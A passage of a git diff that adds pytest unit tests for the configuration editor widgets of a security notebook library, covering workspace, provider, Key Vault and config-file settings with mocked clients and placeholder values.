+    check.equal(curr_files, f_brow.select_file.options)
+    f_brow._open_folder(tgt_folder="msticpy")
+    check.not_equal(curr_files, f_brow.select_file.options)
+
+    f_brow.txt_path.value = str(starting_folder)
+    f_brow._enter_folder(event=None)
+    check.greater(len(f_brow.select_file.options), 0)
+    f_brow.select_file.selected_index = 1
+    f_brow._return_file(btn=None)
+    check.equal(file_name, f_brow.file)
+
+    f_brow.txt_search.value = "*.py"
+    f_brow._search(f_brow.btn_search)
+    check.greater(len(f_brow.select_search.options), 0)
+
+
+def _callback(file):
+    global file_name
+    file_name = file
diff --git a/tests/config/test_item_editors.py b/tests/config/test_item_editors.py
new file mode 100644
index 000000000..19ea3050e
--- /dev/null
+++ b/tests/config/test_item_editors.py
@@ -0,0 +1,482 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Config settings Items editors."""
+import os
+from pathlib import Path
+from unittest.mock import patch
+
+import pytest
+import pytest_check as check
+import yaml
+from msticpy.config.comp_edit import CompEditStatusMixin
+from msticpy.config.ce_azure import CEAzure
+from msticpy.config.ce_azure_sentinel import CEAzureSentinel, _validate_ws
+from msticpy.config.ce_common import get_def_tenant_id
+from msticpy.config.ce_data_providers import CEDataProviders
+from msticpy.config.ce_keyvault import CEKeyVault
+from msticpy.config.ce_other_providers import CEOtherProviders
+from msticpy.config.ce_ti_providers import CETIProviders
+from msticpy.config.ce_user_defaults import CEAutoLoadComps, CEAutoLoadQProvs
+from msticpy.config.compound_ctrls import ArgControl
+from msticpy.config.mp_config_control import MpConfigControls, get_mpconfig_definitions
+
+from ..nbtools.test_user_config import CONFIG_TEXT
+from ..unit_test_lib import TEST_DATA_PATH
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture
+def mp_conf_ctrl():
+    """Create MPConfigControl instance."""
+    CompEditStatusMixin.testing = True
+    mp_defn = get_mpconfig_definitions()
+    config_path = Path(TEST_DATA_PATH).joinpath("msticpyconfig.yaml")
+    conf_settings = {}
+    with open(config_path, "r") as conf_h:
+        conf_settings = yaml.safe_load(conf_h)
+
+    # modify the LocalData to be AzureSentinel
+    user_defaults = yaml.safe_load(CONFIG_TEXT)
+
+    nb_settings = user_defaults["UserDefaults"]["LoadComponents"]["Notebooklets"]
+    q_prov = nb_settings["query_provider"]["LocalData"]
+    del nb_settings["query_provider"]["LocalData"]
+    nb_settings["query_provider"]["AzureSentinel"] = q_prov
+    conf_settings.update(user_defaults)
+
+    return MpConfigControls(mp_config_def=mp_defn, mp_config=conf_settings)
+
+
+_EDITORS = [
+    pytest.param((CEAzureSentinel, ["Placeholder"]), id="CEAzureSentinel"),
+    pytest.param(
+        (CEDataProviders, ["Splunk", "AzureCLI", "LocalData", "Mordor", "Sumologic"]),
+        id="CEDataProviders",
+    ),
+    pytest.param(
+        (CETIProviders, ["OTX", "VirusTotal", "AzureSentinel", "TorExitNodes"]),
+        id="CETIProviders",
+    ),
+    pytest.param((CEOtherProviders, ["GeoIPLite", "IPStack"]), id="CEOtherProviders"),
+    pytest.param(
+        (
+            CEAutoLoadComps,
+            [
+                "TILookup",
+                "GeoIpLookup",
+                "Notebooklets",
+                "Pivot",
+                "AzureData",
+                "AzureSentinelAPI",
+            ],
+        ),
+        id="CEAutoLoadComps",
+    ),
+    pytest.param(
+        (
+            CEAutoLoadQProvs,
+            [
+                "AzureSentinel.Default",
+                "Mordor",
+                "LocalData",
+                "AzureSecurityCenter",
+                "Splunk",
+                "MDE",
+                "SecurityGraph",
+            ],
+        ),
+        id="CEAutoLoadQProvs",
+    ),
+]
+
+
+def _get_select_labels(control):
+    return (opt[0] if isinstance(opt, tuple) else opt for opt in control.options)
+
+
+def _is_current_option(option, control):
+    return option in _get_select_labels(control)
+
+
+# pylint: disable=protected-access
+@pytest.mark.parametrize("editor_test", _EDITORS)
+def test_item_editor_controls(editor_test, mp_conf_ctrl):
+    """Items edit controls."""
+    editor, cases = editor_test
+    edit_comp = editor(mp_controls=mp_conf_ctrl)
+    _execute_item_editor_test(edit_comp, cases)
+
+
+def _execute_item_editor_test(edit_comp, cases):
+    check.is_not_none(edit_comp.help.html_help.value)
+    check.is_not_none(edit_comp._DESCRIPTION)
+    check.is_not_none(edit_comp._COMP_PATH)
+    check.greater_equal(len(edit_comp._HELP_URI), 1)
+
+    for test_opt in cases:
+        print(f"Testing {edit_comp.__class__.__name__}, {test_opt}")
+        opts = edit_comp.select_item.options
+        n_opts = len(opts)
+
+        # If this control has an options list - select the first of these
+        prov_opts = getattr(edit_comp, "prov_options", None)
+        if prov_opts and prov_opts.options:
+            edit_comp.prov_options.value = test_opt
+
+        # If there is an existing item, delete this
+        if _is_current_option(test_opt, edit_comp.select_item):
+            edit_comp.select_item.label = test_opt
+            edit_comp.edit_buttons.btn_del.click()
+            n_opts -= 1
+
+        # Add a new one
+        edit_comp.edit_buttons.btn_add.click()
+        # Save the current item
+        edit_comp.edit_buttons.btn_save.click()
+        check.equal(len(edit_comp.select_item.options), n_opts + 1, "Item added")
+
+        if isinstance(edit_comp, CEAzureSentinel):
+            if _is_current_option("Default", edit_comp.select_item):
+                edit_comp.select_item.label = "Default"
+                edit_comp.edit_buttons.btn_del.click()
+                n_opts -= 1
+
+            edit_comp.btn_set_default.click()
+            edit_comp.edit_buttons.btn_save.click()
+            n_opts += 1
+            check.equal(
+                len(edit_comp.select_item.options), n_opts + 1, "AzSent default added"
+            )
+
+        if prov_opts and prov_opts.options:
+            edit_comp.prov_options.value = test_opt
+            edit_comp.edit_buttons.btn_add.click()
+            # check that we didn't add a duplicate
+            check.equal(
+                len(edit_comp.select_item.options), n_opts + 1, "Dup item not added"
+            )
+
+        # delete whatever we've just added
+        edit_comp.edit_buttons.btn_del.click()
+        check.equal(len(edit_comp.select_item.options), n_opts, "New item deleted")
+
+
+@pytest.mark.parametrize("editor_test", _EDITORS)
+def test_item_editor_controls_empty(editor_test, mp_conf_ctrl):
+    """Items edit controls."""
+    conf_ctrl = MpConfigControls(mp_config_def=mp_conf_ctrl.config_defn, mp_config={})
+    editor, cases = editor_test
+    edit_comp = editor(mp_controls=conf_ctrl)
+    if isinstance(edit_comp, CEAutoLoadQProvs) and "AzureSentinel.Default" in cases:
+        cases.remove("AzureSentinel.Default")
+    _execute_item_editor_test(edit_comp, cases)
+
+
+def test_item_editor_load_comp_notebooklets(mp_conf_ctrl):
+    """Items edit controls."""
+    edit_comp = CEAutoLoadComps(mp_controls=mp_conf_ctrl)
+
+    prev_val = mp_conf_ctrl.get_value("UserDefaults.LoadComponents.Notebooklets")
+    edit_comp.select_item.label = "Notebooklets"
+    edit_comp.edit_buttons.btn_save.click()
+    new_val = mp_conf_ctrl.get_value("UserDefaults.LoadComponents.Notebooklets")
+    check.equal(prev_val, new_val)
+
+
+STORE_TEXT = "Text"
+STORE_ENV_VAR = "EnvironmentVar"
+STORE_KEYVAULT = "KeyVault"
+
+
+def test_arg_controls(mp_conf_ctrl):
+    """Argcontrol is a sub-component for editing Args."""
+    edit_comp = CETIProviders(mp_controls=mp_conf_ctrl)
+    edit_comp.select_item.label = "VirusTotal"
+    provider = edit_comp.select_item.label
+    # get the control for this provider
+    ctrl_path = f"TIProviders.{provider}.Args.AuthKey"
+    arg_ctrl = mp_conf_ctrl.get_control(ctrl_path)
+    store_type = arg_ctrl.rb_store_type.value
+    check.is_in(store_type, (STORE_TEXT, STORE_KEYVAULT, STORE_ENV_VAR))
+
+    arg_ctrl.rb_store_type.value = STORE_TEXT
+    arg_ctrl.txt_val.value = "test_value"
+    edit_comp.edit_buttons.btn_save.click()
+    saved_val = mp_conf_ctrl.get_value(ctrl_path)
+    check.equal(saved_val, "test_value")
+    check.equal(arg_ctrl.cb_kv_def.layout.visibility, "hidden")
+    check.equal(arg_ctrl.btn_add_kv_secret.layout.visibility, "visible")
+
+    arg_ctrl.rb_store_type.value = STORE_ENV_VAR
+    edit_comp.edit_buttons.btn_save.click()
+    saved_val = mp_conf_ctrl.get_value(ctrl_path)
+    check.equal(saved_val, {STORE_ENV_VAR: "test_value"})
+    check.equal(arg_ctrl.cb_kv_def.layout.visibility, "hidden")
+    check.equal(arg_ctrl.btn_add_kv_secret.layout.visibility, "visible")
+
+    arg_ctrl.rb_store_type.value = STORE_KEYVAULT
+    arg_ctrl.cb_kv_def.value = True
+    edit_comp.edit_buttons.btn_save.click()
+    saved_val = mp_conf_ctrl.get_value(ctrl_path)
+    check.equal(saved_val, {STORE_KEYVAULT: None})
+    check.equal(arg_ctrl.cb_kv_def.layout.visibility, "visible")
+    check.equal(arg_ctrl.btn_add_kv_secret.layout.visibility, "hidden")
+    check.is_true(arg_ctrl.txt_val.disabled)
+    check.equal(arg_ctrl.txt_val.value, "")
+
+    arg_ctrl.cb_kv_def.value = False
+    check.is_false(arg_ctrl.txt_val.disabled)
+
+
+KV_SEC_CLIENT_PATCH = ArgControl.__module__ + ".BHKeyVaultClient"
+
+
+@patch(KV_SEC_CLIENT_PATCH)
+def test_tiproviders_editor(kv_sec, mp_conf_ctrl):
+    """TI Providers item editor."""
+    edit_comp = CETIProviders(mp_controls=mp_conf_ctrl)
+    edit_comp.select_item.label = "VirusTotal"
+    provider = edit_comp.select_item.label
+    # get the control for this provider
+    ctrl_path = f"TIProviders.{provider}.Args.AuthKey"
+    arg_ctrl = mp_conf_ctrl.get_control(ctrl_path)
+
+    arg_ctrl.rb_store_type.value = STORE_ENV_VAR
+    arg_ctrl.txt_val.value = "test_var"
+    os.environ["test_var"] = "test_value"
+
+    arg_ctrl.btn_add_kv_secret.click()
+    check.is_true(arg_ctrl.txt_val.disabled)
+    check.equal(arg_ctrl.txt_val.value, "")
+    set_secret, ss_args, _ = kv_sec.mock_calls[1]
+    check.equal(set_secret, "().set_secret")
+    check.equal(ss_args[0], "TIProviders-VirusTotal-Args-AuthKey")
+    check.equal(ss_args[1], "test_value")
+    check.equal(arg_ctrl.rb_store_type.value, STORE_KEYVAULT)
+
+    arg_ctrl.rb_store_type.value = STORE_TEXT
+    arg_ctrl.txt_val.value = "test_value2"
+    arg_ctrl.btn_add_kv_secret.click()
+    check.is_true(arg_ctrl.txt_val.disabled)
+    check.equal(arg_ctrl.txt_val.value, "")
+    check.equal(arg_ctrl.rb_store_type.value, STORE_KEYVAULT)
+    set_secret, ss_args, _ = kv_sec.mock_calls[3]
+    check.equal(set_secret, "().set_secret")
+    check.equal(ss_args[0], "TIProviders-VirusTotal-Args-AuthKey")
+    check.equal(ss_args[1], "test_value2")
+
+    kv_call_count = len(kv_sec.mock_calls)
+    arg_ctrl.rb_store_type.value = STORE_TEXT
+    arg_ctrl.txt_val.value = ""
+    arg_ctrl.btn_add_kv_secret.click()
+    # verify we didn't call KV with blank value
+    check.equal(len(kv_sec.mock_calls), kv_call_count)
+
+
+def test_get_tenant_id():
+    """Test get tenantID function."""
+    tenantid = get_def_tenant_id("40dcc8bf-0478-4f3b-b275-ed0a94f2c013")
+    check.equal(tenantid.casefold(), "72f988bf-86f1-41af-91ab-2d7cd011db47".casefold())
+
+
+def test_azure_sentinel_editor(mp_conf_ctrl):
+    """Microsoft Sentinel edit controls."""
+    edit_comp = CEAzureSentinel(mp_controls=mp_conf_ctrl)
+
+    n_opts = len(edit_comp.select_item.options)
+    edit_comp.edit_buttons.btn_add.click()
+    check.equal(n_opts + 1, len(edit_comp.select_item.options))
+    new_ws = edit_comp.current_workspace
+    result, _ = _validate_ws(new_ws, mp_conf_ctrl, edit_comp._COMP_PATH)
+    check.is_false(result)
+
+    edit_comp.edit_ctrls.children[1].value = "40dcc8bf-0478-4f3b-b275-ed0a94f2c013"
+    edit_comp.edit_ctrls.children[2].value = "40dcc8bf-0478-4f3b-b275-ed0a94f2c013"
+    edit_comp.edit_buttons.btn_save.click()
+    result, _ = _validate_ws(new_ws, mp_conf_ctrl, edit_comp._COMP_PATH)
+    check.is_true(result)
+
+    # Save the current item
+    edit_comp.edit_buttons.btn_save.click()
+    check.is_not_none(mp_conf_ctrl.get_value(f"{edit_comp._COMP_PATH}.{new_ws}"))
+
+    # Rename
+    edit_comp.edit_ctrls.children[0].value = "TestWS"
+    edit_comp.edit_buttons.btn_save.click()
+    ren_workspace_settings = mp_conf_ctrl.get_value(f"{edit_comp._COMP_PATH}.TestWS")
+    check.is_not_none(ren_workspace_settings)
+
+    edit_comp.btn_set_default.click()
+    def_ws = mp_conf_ctrl.get_value(f"{edit_comp._COMP_PATH}.Default")
+    check.equal(def_ws, ren_workspace_settings)
+
+
+def test_key_vault_editor(mp_conf_ctrl):
+    """KeyVault edit controls."""
+    edit_comp = CEKeyVault(mp_controls=mp_conf_ctrl)
+
+    check.is_not_none(edit_comp.help.html_help.value)
+    check.is_not_none(edit_comp._DESCRIPTION)
+    check.is_not_none(edit_comp._COMP_PATH)
+    check.greater_equal(len(edit_comp._HELP_URI), 1)
+
+    edit_comp.controls["TenantId"].value = "tenant"  # invalid UUID
+    edit_comp.controls["SubscriptionId"].value = "sub"  # invalid UUID
+    edit_comp.controls["ResourceGroup"].value = ""  # OK to have empty
+    edit_comp.controls["AzureRegion"].value = ""  # OK to have empty
+    edit_comp.controls["VaultName"].value = ""  # invalid to have empty
+    edit_comp.btn_save.click()
+
+    results = mp_conf_ctrl.validate_setting(f"{edit_comp._COMP_PATH}")
+    check.equal(len(results), 3)
+
+    edit_comp.controls["TenantId"].value = "40dcc8bf-0478-4f3b-b275-ed0a94f2c013"
+    edit_comp.controls["SubscriptionId"].value = "40dcc8bf-0478-4f3b-b275-ed0a94f2c013"
+    edit_comp.controls["ResourceGroup"].value = "resgroup"
+    edit_comp.controls["AzureRegion"].value = "Europe"
+    edit_comp.controls["VaultName"].value = "MyVault"
+    edit_comp.controls["Authority"].value = "global"
+    edit_comp.btn_save.click()
+
+    results = mp_conf_ctrl.validate_setting(f"{edit_comp._COMP_PATH}")
+    check.equal(len(results), 0)
+
+
+def test_azure_editor(mp_conf_ctrl):
+    """Azure settings editor."""
+    edit_comp = CEAzure(mp_controls=mp_conf_ctrl)
+
+    check.is_not_none(edit_comp.help.html_help.value)
+    check.is_not_none(edit_comp._DESCRIPTION)
+    check.is_not_none(edit_comp._COMP_PATH)
+    check.greater_equal(len(edit_comp._HELP_URI), 1)
+
+    with pytest.raises(Exception) as err:
+        edit_comp.controls["cloud"].value = ["no-cloud"]  # invalid item
+    check.equal(err.typename, "TraitError")
+    with pytest.raises(Exception) as err:
+        edit_comp.controls["auth_methods"].value = ["invalid"]  # invalid item
+    check.equal(err.typename, "TraitError")
+    edit_comp.btn_save.click()
+
+    results = mp_conf_ctrl.validate_setting(f"{edit_comp._COMP_PATH}")
+    check.equal(len(results), 0)
+
+    edit_comp.controls["cloud"].value = "usgov"
+    edit_comp.controls["auth_methods"].value = ["cli", "interactive"]
+    edit_comp.btn_save.click()
+
+    results = mp_conf_ctrl.validate_setting(f"{edit_comp._COMP_PATH}")
+    check.equal(len(results), 0)
+
+    new_settings = edit_comp.mp_controls.get_value("Azure")
+    check.equal(new_settings["cloud"], "usgov")
+    check.equal(new_settings["auth_methods"], ["cli", "interactive"])
+
+
+@patch(KV_SEC_CLIENT_PATCH)
+def test_otherproviders_editor(kv_sec, mp_conf_ctrl):
+    """Other providers item edit."""
+    edit_comp = CEOtherProviders(mp_controls=mp_conf_ctrl)
+    edit_comp.select_item.label = "GeoIPLite"
+    provider = edit_comp.select_item.label
+    # get the control for this provider
+    ctrl_path = f"OtherProviders.{provider}.Args.AuthKey"
+    arg_ctrl = mp_conf_ctrl.get_control(ctrl_path)
+
+    arg_ctrl.rb_store_type.value = STORE_ENV_VAR
+    arg_ctrl.txt_val.value = "test_var"
+    os.environ["test_var"] = "test_value"
+
+    edit_comp.edit_buttons.btn_save.click()
+    args_settings = edit_comp.settings["GeoIPLite"]["Args"]["AuthKey"]
+    check.is_in("EnvironmentVar", args_settings)
+    check.equal("test_var", args_settings["EnvironmentVar"])
+
+    arg_ctrl.btn_add_kv_secret.click()
+    check.is_true(arg_ctrl.txt_val.disabled)
+    check.equal(arg_ctrl.txt_val.value, "")
+    set_secret, ss_args, _ = kv_sec.mock_calls[1]
+    check.equal(set_secret, "().set_secret")
+    check.equal(ss_args[0], f"OtherProviders-{provider}-Args-AuthKey")
+    check.equal(ss_args[1], "test_value")
+    check.equal(arg_ctrl.rb_store_type.value, STORE_KEYVAULT)
+
+    edit_comp.edit_buttons.btn_save.click()
+    args_settings = edit_comp.settings["GeoIPLite"]["Args"]["AuthKey"]
+    check.is_in("KeyVault", args_settings)
+    check.is_none(args_settings["KeyVault"])
+
+
+_DATA_PROVIDER_PARAMS = [
+    "Splunk-prod",
+    "Splunk-preprod",
+    "Sumologic",
+    "Sumologic-europe",
+    "Sumologic-northamerica",
+]
+
+
+@pytest.mark.parametrize("test_opt", _DATA_PROVIDER_PARAMS)
+def test_dataprov_instances(test_opt, mp_conf_ctrl):
+    edit_comp = CEDataProviders(mp_controls=mp_conf_ctrl)
+
+    print(f"Testing {edit_comp.__class__.__name__}, {test_opt}")
+    opts = edit_comp.select_item.options
+    n_opts = len(opts)
+
+    # If this control has an options list - select the first of these
+    instance_case = "-" in test_opt
+    prov_name, instance = test_opt.split("-") if instance_case else (test_opt, None)
+    select_item = f"{prov_name}-{instance}" if instance_case else prov_name
+
+    prov_opts = getattr(edit_comp, "prov_options", None)
+    if prov_opts and prov_opts.options:
+        edit_comp.prov_options.value = prov_name
+
+    # If there is an existing item, delete this
+    if _is_current_option(prov_name, edit_comp.select_item):
+        edit_comp.select_item.label = prov_name
+        edit_comp.edit_buttons.btn_del.click()
+        n_opts -= 1
+
+    # Add a new one
+    edit_comp.edit_buttons.btn_add.click()
+    # add the instance name
+    if instance_case:
+        edit_comp.text_prov_instance.value = instance
+    # Save the current item
+    edit_comp.edit_buttons.btn_save.click()
+    check.equal(len(edit_comp.select_item.options), n_opts + 1, "Item added")
+    if instance_case:
+        check.equal(
+            edit_comp.text_prov_instance.value, instance, "Instance name populated"
+        )
+    check.is_in(
+        edit_comp.select_item.label, select_item, "Instance name populated in select"
+    )
+
+    if prov_opts and prov_opts.options:
+        edit_comp.prov_options.value = prov_name
+        edit_comp.edit_buttons.btn_add.click()
+        if instance_case:
+            # duplicates OK for instances because path renamed
+            check.equal(
+                len(edit_comp.select_item.options), n_opts + 2, "Dup item not added"
+            )
+        else:
+            # check that we didn't add a duplicate
+            check.equal(
+                len(edit_comp.select_item.options), n_opts + 1, "Dup item not added"
+            )
+
+    # delete whatever we've just added
+    edit_comp.edit_buttons.btn_del.click()
+    expected_opts = n_opts + 1 if instance_case else n_opts
+    check.equal(len(edit_comp.select_item.options), expected_opts, "New item deleted")
diff --git a/tests/config/test_mp_config.py b/tests/config/test_mp_config.py
new file mode 100644
index 000000000..dfffea083
--- /dev/null
+++ b/tests/config/test_mp_config.py
@@ -0,0 +1,148 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+import json
+from pathlib import Path
+from unittest.mock import patch, PropertyMock
+
+import pytest
+import pytest_check as check
+from msticpy.config.comp_edit import CompEditStatusMixin
+from msticpy.config.mp_config_file import MpConfigFile
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+__author__ = "Ian Hellen"
+
+
+CompEditStatusMixin.testing = True
+
+
+def test_mp_config_file_init():
+    """Test MpConfigFile init."""
+    mpc_file = MpConfigFile()
+    check.is_false(mpc_file.settings)
+
+    # Test loading with empty settings
+    mpc_file = MpConfigFile(settings={})
+
+    mpc_file = MpConfigFile()
+    # load file
+    with pytest.raises(FileNotFoundError):
+        mpc_file.load_from_file("non-existent-file.txt")
+
+    config_path = Path(TEST_DATA_PATH).joinpath("msticpyconfig.yaml")
+    mpc_file = MpConfigFile(file=config_path)
+
+
+def test_mp_config_file_load_default():
+    """Test load_default."""
+    mpc_file = MpConfigFile()
+    mpc_file.load_default()
+    check.is_true(mpc_file.settings)
+
+    mpc_file.settings = None
+    mpc_file.buttons["load_def"].click()
+    check.is_true(mpc_file.settings)
+
+
+def test_mp_config_file_validate():
+    """Test validate."""
+    mpc_file = MpConfigFile()
+    mpc_file.validate_settings()
+    check.is_in(mpc_file.txt_viewer, mpc_file.viewer.children)
+    check.is_true(len(mpc_file.txt_viewer.value) > 0)
+
+
+def test_mp_config_file_view_settings():
+    """Test view settings."""
+    mpc_file = MpConfigFile()
+    mpc_file.txt_viewer.value = ""
+    mpc_file.view_settings()
+    check.is_true(len(mpc_file.txt_viewer.value) > 0)
+    mpc_file.buttons["view"].click()
+    mpc_file.btn_close.click()
+
+
+def test_mp_config_file_browse():
+    """Test browse."""
+    mpc_file = MpConfigFile()
+    mpc_file.browse_for_file()
+    check.is_in(mpc_file.file_browser.layout, mpc_file.viewer.children)
+    mpc_file.btn_close.click()
+
+
+def test_mp_config_file_save():
+    """Test save."""
+    mpc_file = MpConfigFile()
+    mpc_file.load_default()
+    tgt_file = "./msticpy_test.yaml"
+    mpc_file.save_to_file(tgt_file)
+    check.is_true(Path(tgt_file).is_file())
+    mpc_file.save_to_file(tgt_file)
+
+    check.is_true(Path().glob(f"{tgt_file}.save_*"))
+    Path(tgt_file).unlink()
+    for test_file in Path().glob(f"{tgt_file}.save_*"):
+        test_file.unlink()
+
+    mpc_file.txt_current_file.value = tgt_file
+    mpc_file.buttons["save"].click()  # same thing but via button click
+    check.is_true(Path(tgt_file).is_file())
+    Path(tgt_file).unlink()
+
+
+def test_mp_config_file_convert():
+    """Test convert."""
+    # config json convert
+    config_json = Path(TEST_DATA_PATH).joinpath("config.json")
+    mpc_file = MpConfigFile(file=config_json)
+    mp_equiv = mpc_file.map_json_to_mp_ws().get("AzureSentinel", {}).get("Workspaces")
+
+    j_text = config_json.read_text()
+    config_j = json.loads(j_text)
+    workspace = config_j.get("workspace_name", "Default")
+    check.equal(config_j["resource_group"], mp_equiv[workspace]["ResourceGroup"])
+    check.equal(config_j["subscription_id"], mp_equiv[workspace]["SubscriptionId"])
+    check.equal(config_j["tenant_id"], mp_equiv[workspace]["TenantId"])
+    check.equal(config_j["workspace_id"], mp_equiv[workspace]["WorkspaceId"])
+
+    # config json convert in-place
+    config_json = Path(TEST_DATA_PATH).joinpath("config.json")
+    mpc_file = MpConfigFile(file=config_json)
+    mpc_file.buttons["convert"].click()
+    check.is_in("AzureSentinel", mpc_file.settings)
+
+
+_KV_SECS = {"url/Item1": "Value1", "url/Item2": "Value2"}
+KV_SEC_CLIENT_PATCH = MpConfigFile.__module__ + ".BHKeyVaultClient"
+
+
+@patch(KV_SEC_CLIENT_PATCH)
+def test_mp_config_file_show_kv(kv_client):
+    """Test view secrets."""
+    del kv_client
+    mpc_file = MpConfigFile()
+
+    mpc_file.show_kv_secrets()
+    check.is_not_none(mpc_file.kv_client)
+
+    # set up mocked kv_client
+    sec_list = list(_KV_SECS.keys())
+    sec_list.append("url/MissingValue")
+    type(mpc_file.kv_client).secrets = PropertyMock(return_value=sec_list)
+    mpc_file.kv_client.get_secret = lambda sec: _KV_SECS[f"url/{sec}"]
+
+    # run show secrets again with mocked client
+    mpc_file.show_kv_secrets()
+
+    for name, val in _KV_SECS.items():
+        s_name = name.split("/")[-1]
+        check.is_in(s_name, mpc_file.txt_viewer.value)
+        check.is_in(val, mpc_file.txt_viewer.value)
+
+    check.is_in("MissingValue", mpc_file.txt_viewer.value)
+    check.is_in("Value: Could not display secret", mpc_file.txt_viewer.value)
diff --git a/tests/config/test_mp_config_controls.py b/tests/config/test_mp_config_controls.py
new file mode 100644
index 000000000..f0b071e98
--- /dev/null
+++ b/tests/config/test_mp_config_controls.py
@@ -0,0 +1,286 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from pathlib import Path
+
+import pytest
+import pytest_check as check
+import yaml
+from msticpy.config.comp_edit import SettingsControl
+from msticpy.config.ce_common import get_defn_or_default, get_or_create_mpc_section
+from msticpy.config.mp_config_control import (
+    MpConfigControls,
+    get_mpconfig_definitions,
+)
+
+from ..unit_test_lib import TEST_DATA_PATH
+from ..nbtools.test_user_config import CONFIG_TEXT
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture
+def mp_conf_ctrl():
+    """Create MPConfigControl instance."""
+    mp_defn = get_mpconfig_definitions()
+    config_path = Path(TEST_DATA_PATH).joinpath("msticpyconfig.yaml")
+    conf_settings = {}
+    with open(config_path, "r") as conf_h:
+        conf_settings = yaml.safe_load(conf_h)
+
+    # modify the LocalData to be AzureSentinel
+    user_defaults = yaml.safe_load(CONFIG_TEXT)
+
+    nb_settings = user_defaults["UserDefaults"]["LoadComponents"]["Notebooklets"]
+    q_prov = nb_settings["query_provider"]["LocalData"]
+    del nb_settings["query_provider"]["LocalData"]
+    nb_settings["query_provider"]["AzureSentinel"] = q_prov
+    conf_settings.update(user_defaults)
+
+    return MpConfigControls(mp_config_def=mp_defn, mp_config=conf_settings)
+
+
+def test_mp_config_controls_load(mp_conf_ctrl: MpConfigControls):
+    """Loading MpConfigControls."""
+    check.is_not_none(mp_conf_ctrl.mp_config)
+    check.is_not_none(mp_conf_ctrl.config_defn)
+    check.is_not_none(mp_conf_ctrl.controls)
+
+    results = mp_conf_ctrl.validate_all_settings()
+    # We have one bad setting due to our test mpconfig
+    check.equal(len(results), 1)
+    check.equal(
+        results[0][1], "Validation failed for path 'TIProviders.AzureSentinel.Provider'"
+    )
+
+    get_or_create_mpc_section(mp_conf_ctrl, "TestSettings", "TestSubkey")
+    val = mp_conf_ctrl.get_value("TestSettings")
+    check.is_not_none(val)
+    check.is_in("TestSubkey", val)
+
+
+NEW_WS = {
+    "WorkspaceId": "a927809c-8142-43e1-96b3-4ad87cfe95a3",
+    "TenantId": "69d28fd7-42a5-48bc-a619-af56397b9f28",
+}
+
+
+def test_mp_config_controls_values(mp_conf_ctrl: MpConfigControls):
+    """Loading MpConfigControls."""
+    val = mp_conf_ctrl.get_value("AzureSentinel.Workspaces")
+    check.is_instance(val, dict)
+    check.equal(len(val), 2)
+
+    mp_conf_ctrl.set_value("AzureSentinel.Workspaces.TestWS", NEW_WS)
+    check.equal(len(mp_conf_ctrl.get_value("AzureSentinel.Workspaces")), 3)
+
+    mp_conf_ctrl.rename_path(
+        "AzureSentinel.Workspaces.TestWS", "AzureSentinel.Workspaces.TestWS_ren"
+    )
+    val = mp_conf_ctrl.get_value("AzureSentinel.Workspaces.TestWS_ren")
+    check.is_instance(val, dict)
+    check.equal(len(val), 2)
+
+    mp_conf_ctrl.del_value("AzureSentinel.Workspaces.TestWS_ren")
+
+
+class TestCtrl(SettingsControl):
+    """Test control."""
+
+    __test__ = False
+
+    def __init__(self, value):
+        """Initialize control."""
+        self._val = value
+
+    @property
+    def value(self):
+        """Return value."""
+        return self._val
+
+    @value.setter
+    def value(self, value):
+        """Set value."""
+        self._val = value
+
+
+TEST_PATH_WS = "AzureSentinel.Workspaces.TestWS"
+NEW_WS = {
+    "WorkspaceId": "a927809c-8142-43e1-96b3-4ad87cfe95a3",
+    "TenantId": "69d28fd7-42a5-48bc-a619-af56397b9f28",
+}
+
+
+def test_mp_config_controls_ctrls(mp_conf_ctrl: MpConfigControls):
+    """Loading MpConfigControls."""
+    val = mp_conf_ctrl.get_value("AzureSentinel.Workspaces")
+    check.is_instance(val, dict)
+    check.equal(len(val), 2)
+
+    mp_conf_ctrl.set_value(TEST_PATH_WS, NEW_WS)
+
+    ctrl = TestCtrl(value=NEW_WS)
+
+    mp_conf_ctrl.set_control(TEST_PATH_WS, ctrl)
+    ctrl2 = mp_conf_ctrl.get_control(TEST_PATH_WS)
+    check.equal(ctrl, ctrl2)
+
+    # Change the value of the dict and set the control value to this
+    NEW_WS["TenantId"] = "TestGUID---1"
+    ctrl.value = NEW_WS
+    ctrl2 = mp_conf_ctrl.get_control(TEST_PATH_WS)
+    check.equal(ctrl2.value, NEW_WS)
+    # Test saving control value
+    mp_conf_ctrl.save_ctrl_values(TEST_PATH_WS)
+    check.equal(mp_conf_ctrl.get_value(TEST_PATH_WS), NEW_WS)
+
+    # Change dict and set the settings value
+    NEW_WS["TenantId"] = "TestGUID---2"
+    mp_conf_ctrl.set_value(TEST_PATH_WS, NEW_WS)
+
+    mp_conf_ctrl.populate_ctrl_values(TEST_PATH_WS)
+    ctrl2 = mp_conf_ctrl.get_control(TEST_PATH_WS)
+    check.equal(ctrl2.value, NEW_WS)
+
+
+TEST_PATH_XF = "TIProviders.XForce"
+
+
+def test_mp_config_controls_defn(mp_conf_ctrl):
+    """Test misc functions."""
+    defn = mp_conf_ctrl.get_defn(TEST_PATH_XF)
+    for name, item_def in defn.items():
+        if name == "Args":
+            check.is_instance(item_def, dict)
+            for s_name, s_item_def in item_def.items():
+                print(s_name, s_item_def)
+                check.is_in(s_name, ("ApiID", "AuthKey", "UseVT3PrivateAPI"))
+                if s_name == "UseVT3PrivateAPI":
+                    continue
+                i_type, i_opts = get_defn_or_default(s_item_def)
+                check.equal(i_type, "cred_key")
+                ck_defn = i_opts.get("defn")
+                check.is_in("one_of", ck_defn)
+                for one_of in ck_defn["one_of"]:
+                    oo_name, oo_defn = next(iter(one_of.items()))
+                    check.is_in(oo_name, ("str", "EnvironmentVar", "KeyVault"))
+                    check.is_true(oo_defn.startswith("str"))
+
+        if name == "Provider":
+            check.is_instance(item_def, str)
+        if name == "Primary":
